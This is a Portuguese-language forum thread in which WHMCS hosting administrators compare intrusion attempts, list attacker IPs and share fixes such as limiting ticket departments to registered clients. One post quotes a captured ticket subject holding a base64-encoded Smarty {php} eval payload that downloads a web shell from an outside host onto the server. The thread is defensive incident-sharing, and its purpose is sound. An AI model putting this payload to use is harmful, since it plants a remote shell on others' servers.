Tentativas de invasão em meu WHMCS

[Marco Antonio]

Eu estou sendo o fregues.. agora de novo hehehe a 4 vez, hoje já a segunda, o IP foi 197.15.22.224

[Rocha Neto]

No meu tbm Marco, todos os dias são pelo menos 2 tentativas.

[Michael]

aconteceu mesma coisa comigo mais chego por ticket mais ele não mudou a senha nem

entrou no admin, tinha acontecido semana passada e ele mudo a senha mais não entrou.

[Marco Antonio]

Novamente atacado hehehe hoje é a 3 vez, so que me causou curiosidade, pois o usuario usou IP brazuca 177.12.131.19 do Estado de : Amapa Cidade de: Macapá

[EuMarcos]

Aqui foi bloqueado no servidor para rejeitar ips da: Arabia, China... kkk

Hoje tive 2 ataques e os ips eram do Brasil, SP e RS.

[Cassiano Teixeira]

Este fim de semana estou recebendo outros também - Não vou postar aqui todos, pois fica repetitivo, mais pelo visto, o "cidadão" voltou a incomodar.

[leonelborges]

+ 1 para coleção

Departamento: Abuse e SPAM

Assunto: {php}eval(base64_decode('JGNvZGUgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2Jsb2dnZXIuY29tLnRlcm5hdGVrb3RhLmdvLmlkL3RleHQvd3NvYjIucGhwJyk7CiRmbyA9IGZvcGVuKCJ3c29iMi5waHAiLCJ3Iik7CmZ3cml0ZSgkZm8sJGNvZGUpOw==')){/php}

Prioridade: Medium

IP: 103.10.64.30

IP Country: Indonesia

-------------------------

Lembrando que ele so conseguiu criar o ticket, porque o departamento estava livre para criar tickets para não clientes.

Permitir abertura de tickets no departamento somente para clientes registrados.

Opções/Suporte/Departamentos de Suporte, edite o departamento desejado e ative

(Permitir abertura de tickets nesse departamento somente por clientes registrados)

[Enio F.]

Há alguns dias atrás recebi no meu sistema diversos cadastros (76 para ser mais exato) com três IP's diferentes vindos do Japão em dois dias, nos primeiros até tentamos contatar os responsáveis pelos registros mas não obtivemos nenhuma resposta. Não sei ao certo se isso foi uma tentativa de invasão mas foi um caso atípico

[Agencia Moderna]

Eu tive esse ataque apenas uma vez, depois disso não tentaram mais... Também desabilitei a função base64_decode no php.ini...

[Clebson]

Pessoal, por que isso esta acontecendo? Simples, os códigos para invasão foram todos divulgados publicamente, aqui no fórum, então o "palhaço" que esta tentando invadir, pegou os códigos aqui no fórum e saiu enviando para todas as empresas. Esses códigos jamais deveriam ser publicados assim.